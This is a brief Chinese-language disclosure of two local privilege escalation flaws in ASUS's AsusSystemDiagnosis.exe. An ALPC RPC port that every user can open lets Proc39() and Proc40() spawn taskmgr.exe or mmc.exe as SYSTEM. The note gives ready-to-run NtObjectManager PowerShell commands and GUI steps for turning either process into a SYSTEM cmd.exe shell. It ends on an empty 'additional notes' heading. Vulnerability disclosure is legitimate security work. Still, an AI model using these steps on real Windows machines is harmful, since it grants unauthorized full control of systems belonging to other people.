权限提升 - AsusSystemDiagnosis.exe - Proc39()
完整路径: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
问题:
由 AsusSystemDiagnosis.exe 暴露的 ALPC 端口 \RPC Control\ASHWTestServer 对所有用户完全可访问。通过此端口调用 RPC 的 Proc39() 会在当前用户会话中生成一个以 SYSTEM 权限运行的 taskmgr.exe 进程。
利用:
利用 Project Zero 的 NtObjectManager RPC 工具(来自 https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools,请确保使用编译好的版本),可以连接到易受攻击的 RPC 端口,然后调用 Proc39()。一旦生成了 SYSTEM 权限的 taskmgr.exe 进程,就可以通过上下文菜单中的“运行新任务”功能(文件 > 运行新任务 > cmd.exe)创建一个 cmd.exe shell。
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
权限提升 - AsusSystemDiagnosis.exe - Proc40()
与上述相同,但生成以 SYSTEM 权限运行的 mmc.exe。可以创建新任务,或使用浏览功能打开 explorer.exe 窗口并从地址栏执行 cmd.exe。
附加说明: